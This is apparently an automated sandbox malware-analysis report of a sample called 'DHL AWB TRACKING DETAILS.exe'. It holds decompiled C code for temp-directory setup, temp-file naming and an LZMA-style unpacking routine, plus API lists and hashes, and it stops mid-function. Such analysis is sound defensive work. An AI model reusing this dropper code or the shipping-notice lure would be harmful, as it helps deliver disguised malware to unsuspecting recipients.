                    				int _t19;
                    				struct _SECURITY_ATTRIBUTES* _t20;
                    				signed char _t22;
                    				struct _SECURITY_ATTRIBUTES* _t23;
                    				CHAR* _t25;
                    				struct _SECURITY_ATTRIBUTES** _t29;
                    				void* _t30;
                    
                    				_t23 = __ebx;
                    				_t25 = E004029E8(0xfffffff0);
                    				_t10 = E0040560C(_t25);
                    				_t27 = _t10;
                    				if(_t10 != __ebx) {
                    					do {
                    						_t29 = E004055A3(_t27, 0x5c);
                    						 *_t29 = _t23;
                    						 *((char*)(_t30 + 0xb)) =  *_t29;
                    						_t19 = CreateDirectoryA(_t25, _t23); // executed
                    						if(_t19 == 0) {
                    							if(GetLastError() != 0xb7) {
                    								L4:
                    								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
                    							} else {
                    								_t22 = GetFileAttributesA(_t25); // executed
                    								if((_t22 & 0x00000010) == 0) {
                    									goto L4;
                    								}
                    							}
                    						}
                    						_t20 =  *((intOrPtr*)(_t30 + 0xb));
                    						 *_t29 = _t20;
                    						_t27 =  &(_t29[0]);
                    					} while (_t20 != _t23);
                    				}
                    				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
                    					_push(0xfffffff5);
                    					E00401423();
                    				} else {
                    					E00401423(0xffffffe6);
                    					E00405A85("C:\\Users\\engineer\\AppData\\Local\\Temp", _t25);
                    					SetCurrentDirectoryA(_t25); // executed
                    				}
                    				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
                    				return 0;
                    			}












                    APIs
                      • Part of subcall function 0040560C: CharNextA.USER32(004053BE,?,004218A0,00000000,00405670,004218A0,004218A0,?,?,747DF560,004053BE,?,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,747DF560), ref: 0040561A
                      • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040561F
                      • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040562E
                    • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                    • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                    • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                    • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                    Strings
                    • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                    • String ID: C:\Users\user\AppData\Local\Temp
                    • API String ID: 3751793516-1104044542
                    • Opcode ID: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                    • Instruction ID: 11ba4fe5436512bc7837d50811c3794abd92905400bb47a2e3f09ad75438aea6
                    • Opcode Fuzzy Hash: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                    • Instruction Fuzzy Hash: B3010431908150AFDB116FB51D44D7F67B0AA56365768073BF491B22E2C63C4942D62E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 622 40578b-405795 623 405796-4057c0 GetTickCount GetTempFileNameA 622->623 624 4057c2-4057c4 623->624 625 4057cf-4057d1 623->625 624->623 626 4057c6 624->626 627 4057c9-4057cc 625->627 626->627
                    C-Code - Quality: 100%
                    			E0040578B(char _a4, intOrPtr _a6, CHAR* _a8) {
                    				signed int _t11;
                    				int _t14;
                    				signed int _t16;
                    				void* _t19;
                    				CHAR* _t20;
                    
                    				_t20 = _a4;
                    				_t19 = 0x64;
                    				while(1) {
                    					_t19 = _t19 - 1;
                    					_a4 = 0x61736e;
                    					_t11 = GetTickCount();
                    					_t16 = 0x1a;
                    					_a6 = _a6 + _t11 % _t16;
                    					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                    					if(_t14 != 0) {
                    						break;
                    					}
                    					if(_t19 != 0) {
                    						continue;
                    					}
                    					 *_t20 =  *_t20 & 0x00000000;
                    					return _t14;
                    				}
                    				return _t20;
                    			}









                    APIs
                    • GetTickCount.KERNEL32 ref: 0040579E
                    • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004057B8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: CountFileNameTempTick
                    • String ID: "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                    • API String ID: 1716503409-896006169
                    • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                    • Instruction ID: 4fcdc00fff711095840056c8ed2a58f2bfde19b521d5dac465ae6a1bf3f6778c
                    • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                    • Instruction Fuzzy Hash: F9F0A736348304B6D7104E55DC04B9B7F69DF91750F14C02BFA449B1C0D6B0995497A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02380974
                    Memory Dump Source
                    • Source File: 00000000.00000002.362270592.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02380000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2380000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 8e4870336c8819dfd635fe3f329b0fc3c801201e30445c4982ce548472fb44e3
                    • Instruction ID: 7dfc3ff5c4e6c2be1fba3a8ef4446ba19ffed8f6a67757f3baf9d0e7bd3c7616
                    • Opcode Fuzzy Hash: 8e4870336c8819dfd635fe3f329b0fc3c801201e30445c4982ce548472fb44e3
                    • Instruction Fuzzy Hash: A9611B35E50348EBEB64EBE4E951BEEB7B6AF48710F204416E518EE2A0E7700E45DF05
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 84%
                    			E004031F1(void* __eflags) {
                    				void* _t2;
                    				void* _t5;
                    				CHAR* _t6;
                    
                    				_t6 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
                    				E00405CE3(_t6);
                    				_t2 = E004055E5(_t6);
                    				if(_t2 != 0) {
                    					E00405578(_t6);
                    					CreateDirectoryA(_t6, 0); // executed
                    					_t5 = E0040578B("1033", _t6); // executed
                    					return _t5;
                    				} else {
                    					return _t2;
                    				}
                    			}







                    APIs
                      • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                      • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                      • Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                      • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                    • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00403212
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: Char$Next$CreateDirectoryPrev
                    • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                    • API String ID: 4115351271-3512041753
                    • Opcode ID: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                    • Instruction ID: 52f5018bb87fe832e559484150a565c10a299960058697363e648776ae6da385
                    • Opcode Fuzzy Hash: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                    • Instruction Fuzzy Hash: 68D0C92164AD3036D551372A3D0AFDF090D9F4272EF21417BF804B50CA5B6C6A8319EF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 99%
                    			E00406481() {
                    				signed int _t530;
                    				void _t537;
                    				signed int _t538;
                    				signed int _t539;
                    				unsigned short _t569;
                    				signed int _t579;
                    				signed int _t607;
                    				void* _t627;
                    				signed int _t628;
                    				signed int _t635;
                    				signed int* _t643;
                    				void* _t644;
                    
                    				L0:
                    				while(1) {
                    					L0:
                    					_t530 =  *(_t644 - 0x30);
                    					if(_t530 >= 4) {
                    					}
                    					 *(_t644 - 0x40) = 6;
                    					 *(_t644 - 0x7c) = 0x19;
                    					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                    					while(1) {
                    						L145:
                    						 *(_t644 - 0x50) = 1;
                    						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                    						while(1) {
                    							L149:
                    							if( *(_t644 - 0x48) <= 0) {
                    								goto L155;
                    							}
                    							L150:
                    							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                    							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                    							 *(_t644 - 0x54) = _t643;
                    							_t569 =  *_t643;
                    							_t635 = _t569 & 0x0000ffff;
                    							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                    							if( *(_t644 - 0xc) >= _t607) {
                    								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                    								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                    								_t628 = _t627 + 1;
                    								 *_t643 = _t569 - (_t569 >> 5);
                    								 *(_t644 - 0x50) = _t628;
                    							} else {
                    								 *(_t644 - 0x10) = _t607;
                    								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                    								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                    							}
                    							if( *(_t644 - 0x10) >= 0x1000000) {
                    								L148:
                    								_t487 = _t644 - 0x48;
                    								 *_t487 =  *(_t644 - 0x48) - 1;
                    								L149:
                    								if( *(_t644 - 0x48) <= 0) {
                    									goto L155;
                    								}
                    								goto L150;
                    							} else {
                    								L154:
                    								L146:
                    								if( *(_t644 - 0x6c) == 0) {
                    									L169:
                    									 *(_t644 - 0x88) = 0x18;
                    									L170:
                    									_t579 = 0x22;
                    									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                    									_t539 = 0;
                    									L172:
                    									return _t539;
                    								}
                    								L147:
                    								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                    								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                    								_t484 = _t644 - 0x70;
                    								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                    								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                    								goto L148;
                    							}
                    							L155:
                    							_t537 =  *(_t644 - 0x7c);
                    							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                    							while(1) {
                    								L140:
                    								 *(_t644 - 0x88) = _t537;
                    								while(1) {
                    									L1:
                    									_t538 =  *(_t644 - 0x88);
                    									if(_t538 > 0x1c) {
                    										break;
                    									}
                    									L2:
                    									switch( *((intOrPtr*)(_t538 * 4 +  &M004068EF))) {
                    										case 0:
                    											L3:
                    											if( *(_t644 - 0x6c) == 0) {
                    												goto L170;
                    											}
                    											L4:
                    											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                    											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                    											_t538 =  *( *(_t644 - 0x70));
                    											if(_t538 > 0xe1) {
                    												goto L171;
                    											}
                    											L5:
                    											_t542 = _t538 & 0x000000ff;
                    											_push(0x2d);
                    											asm("cdq");
                    											_pop(_t581);
                    											_push(9);
                    											_pop(_t582);
                    											_t638 = _t542 / _t581;
                    											_t544 = _t542 % _t581 & 0x000000ff;
                    											asm("cdq");
                    											_t633 = _t544 % _t582 & 0x000000ff;
                    											 *(_t644 - 0x3c) = _t633;
                    											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                    											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                    											_t641 = (0x300 << _t633 + _t638) + 0x736;
                    											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                    												L10:
                    												if(_t641 == 0) {
                    													L12:
                    													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                    													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                    													goto L15;
                    												} else {
                    													goto L11;
                    												}
                    												do {
                    													L11:
                    													_t641 = _t641 - 1;
                    													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                    												} while (_t641 != 0);
                    												goto L12;
                    											}
                    											L6:
                    											if( *(_t644 - 4) != 0) {
                    												GlobalFree( *(_t644 - 4));
                    											}
                    											_t538 = GlobalAlloc(0x40, 0x600); // executed
                    											 *(_t644 - 4) = _t538;
                    											if(_t538 == 0) {
                    												goto L171;
                    											} else {
                    												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                    												goto L10;
                    											}
                    										case 1:
                    											L13:
                    											__eflags =  *(_t644 - 0x6c);
                    											if( *(_t644 - 0x6c) == 0) {
                    												L157:
                    												 *(_t644 - 0x88) = 1;
                    												goto L170;
                    											}
                    											L14:
                    											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                    											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                    											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                    											_t45 = _t644 - 0x48;
                    											 *_t45 =  *(_t644 - 0x48) + 1;
                    											__eflags =  *_t45;
                    											L15:
                    											if( *(_t644 - 0x48) < 4) {
                    												goto L13;
                    											}
                    											L16:
                    											_t550 =  *(_t644 - 0x40);
                    											if(_t550 ==  *(_t644 - 0x74)) {
                    												L20:
                    												 *(_t644 - 0x48) = 5;
                    												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                    												goto L23;
                    											}
                    											L17:
                    											 *(_t644 - 0x74) = _t550;
                    											if( *(_t644 - 8) != 0) {
                    												GlobalFree( *(_t644 - 8));
                    											}
                    											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                    											 *(_t644 - 8) = _t538;
                    											if(_t538 == 0) {
                    												goto L171;
                    											} else {
                    												goto L20;
                    											}
                    										case 2:
                    											L24:
                    											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                    											 *(_t644 - 0x84) = 6;
                    											 *(_t644 - 0x4c) = _t557;
                    											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                    											goto L132;
                    										case 3:
                    											L21:
                    											__eflags =  *(_t644 - 0x6c);
                    											if( *(_t644 - 0x6c) == 0) {
                    												L158:
                    												 *(_t644 - 0x88) = 3;
                    												goto L170;
                    											}
                    											L22:
                    											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                    											_t67 = _t644 - 0x70;
                    											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                    											__eflags =  *_t67;
                    											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                    											L23:
                    											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                    											if( *(_t644 - 0x48) != 0) {
                    												goto L21;
                    											}
                    											goto L24;
                    										case 4:
                    											L133:
                    											_t559 =  *_t642;
                    											_t626 = _t559 & 0x0000ffff;
                    											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                    											if( *(_t644 - 0xc) >= _t596) {
                    												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                    												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                    												 *(_t644 - 0x40) = 1;
                    												_t560 = _t559 - (_t559 >> 5);
                    												__eflags = _t560;
                    												 *_t642 = _t560;
                    											} else {
                    												 *(_t644 - 0x10) = _t596;
                    												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                    												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                    											}
                    											if( *(_t644 - 0x10) >= 0x1000000) {
                    												goto L139;
                    											} else {
                    												goto L137;
                    											}
                    										case 5:
                    											L137:
                    											if( *(_t644 - 0x6c) == 0) {
                    												L168:
                    												 *(_t644 - 0x88) = 5;
                    												goto L170;
                    											}
                    											L138:
                    											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                    											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                    											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                    											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                    											L139:
                    											_t537 =  *(_t644 - 0x84);
                    											L140:
                    											 *(_t644 - 0x88) = _t537;
                    											goto L1;
                    										case 6:
                    											L25:
                    											__edx = 0;
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												L36:
                    												__eax =  *(__ebp - 4);
                    												__ecx =  *(__ebp - 0x38);
                    												 *(__ebp - 0x34) = 1;
                    												 *(__ebp - 0x84) = 7;
                    												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                    												goto L132;
                    											}
                    											L26:
                    											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                    											__esi =  *(__ebp - 0x60);
                    											__cl = 8;
                    											__cl = 8 -  *(__ebp - 0x3c);
                    											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                    											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                    											__ecx =  *(__ebp - 0x3c);
                    											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                    											__ecx =  *(__ebp - 4);
                    											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                    											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                    											__eflags =  *(__ebp - 0x38) - 4;
                    											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                    											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                    											if( *(__ebp - 0x38) >= 4) {
                    												__eflags =  *(__ebp - 0x38) - 0xa;
                    												if( *(__ebp - 0x38) >= 0xa) {
                    													_t98 = __ebp - 0x38;
                    													 *_t98 =  *(__ebp - 0x38) - 6;
                    													__eflags =  *_t98;
                    												} else {
                    													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                    												}
                    											} else {
                    												 *(__ebp - 0x38) = 0;
                    											}
                    											__eflags =  *(__ebp - 0x34) - __edx;
                    											if( *(__ebp - 0x34) == __edx) {
                    												L35:
                    												__ebx = 0;
                    												__ebx = 1;
                    												goto L61;
                    											} else {
                    												L32:
                    												__eax =  *(__ebp - 0x14);
                    												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    												__eflags = __eax -  *(__ebp - 0x74);
                    												if(__eax >=  *(__ebp - 0x74)) {
                    													__eax = __eax +  *(__ebp - 0x74);
                    													__eflags = __eax;
                    												}
                    												__ecx =  *(__ebp - 8);
                    												__ebx = 0;
                    												__ebx = 1;
                    												__al =  *((intOrPtr*)(__eax + __ecx));
                    												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                    												goto L41;
                    											}
                    										case 7:
                    											L66:
                    											__eflags =  *(__ebp - 0x40) - 1;
                    											if( *(__ebp - 0x40) != 1) {
                    												L68:
                    												__eax =  *(__ebp - 0x24);
                    												 *(__ebp - 0x80) = 0x16;
                    												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                    												__eax =  *(__ebp - 0x28);
                    												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                    												__eax =  *(__ebp - 0x2c);
                    												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                    												__eax = 0;
                    												__eflags =  *(__ebp - 0x38) - 7;
                    												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                    												__al = __al & 0x000000fd;
                    												__eax = (__eflags >= 0) - 1 + 0xa;
                    												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                    												__eax =  *(__ebp - 4);
                    												__eax =  *(__ebp - 4) + 0x664;
                    												__eflags = __eax;
                    												 *(__ebp - 0x58) = __eax;
                    												goto L69;
                    											}
                    											L67:
                    											__eax =  *(__ebp - 4);
                    											__ecx =  *(__ebp - 0x38);
                    											 *(__ebp - 0x84) = 8;
                    											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                    											goto L132;
                    										case 8:
                    											L70:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												__eax =  *(__ebp - 4);
                    												__ecx =  *(__ebp - 0x38);
                    												 *(__ebp - 0x84) = 0xa;
                    												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                    											} else {
                    												__eax =  *(__ebp - 0x38);
                    												__ecx =  *(__ebp - 4);
                    												__eax =  *(__ebp - 0x38) + 0xf;
                    												 *(__ebp - 0x84) = 9;
                    												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                    												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                    											}
                    											goto L132;
                    										case 9:
                    											L73:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												goto L90;
                    											}
                    											L74:
                    											__eflags =  *(__ebp - 0x60);
                    											if( *(__ebp - 0x60) == 0) {
                    												goto L171;
                    											}
                    											L75:
                    											__eax = 0;
                    											__eflags =  *(__ebp - 0x38) - 7;
                    											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                    											__eflags = _t259;
                    											0 | _t259 = _t259 + _t259 + 9;
                    											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                    											goto L76;
                    										case 0xa:
                    											L82:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												L84:
                    												__eax =  *(__ebp - 4);
                    												__ecx =  *(__ebp - 0x38);
                    												 *(__ebp - 0x84) = 0xb;
                    												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                    												goto L132;
                    											}
                    											L83:
                    											__eax =  *(__ebp - 0x28);
                    											goto L89;
                    										case 0xb:
                    											L85:
                    											__eflags =  *(__ebp - 0x40);
                    											if( *(__ebp - 0x40) != 0) {
                    												__ecx =  *(__ebp - 0x24);
                    												__eax =  *(__ebp - 0x20);
                    												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                    											} else {
                    												__eax =  *(__ebp - 0x24);
                    											}
                    											__ecx =  *(__ebp - 0x28);
                    											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                    											L89:
                    											__ecx =  *(__ebp - 0x2c);
                    											 *(__ebp - 0x2c) = __eax;
                    											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                    											L90:
                    											__eax =  *(__ebp - 4);
                    											 *(__ebp - 0x80) = 0x15;
                    											__eax =  *(__ebp - 4) + 0xa68;
                    											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                    											goto L69;
                    										case 0xc:
                    											L99:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												L164:
                    												 *(__ebp - 0x88) = 0xc;
                    												goto L170;
                    											}
                    											L100:
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t334 = __ebp - 0x70;
                    											 *_t334 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t334;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											__eax =  *(__ebp - 0x2c);
                    											goto L101;
                    										case 0xd:
                    											L37:
                    											__eflags =  *(__ebp - 0x6c);
                    											if( *(__ebp - 0x6c) == 0) {
                    												L159:
                    												 *(__ebp - 0x88) = 0xd;
                    												goto L170;
                    											}
                    											L38:
                    											__ecx =  *(__ebp - 0x70);
                    											__eax =  *(__ebp - 0xc);
                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											_t122 = __ebp - 0x70;
                    											 *_t122 =  *(__ebp - 0x70) + 1;
                    											__eflags =  *_t122;
                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                    											L39:
                    											__eax =  *(__ebp - 0x40);
                    											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                    											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                    												goto L48;
                    											}
                    											L40:
                    											__eflags = __ebx - 0x100;
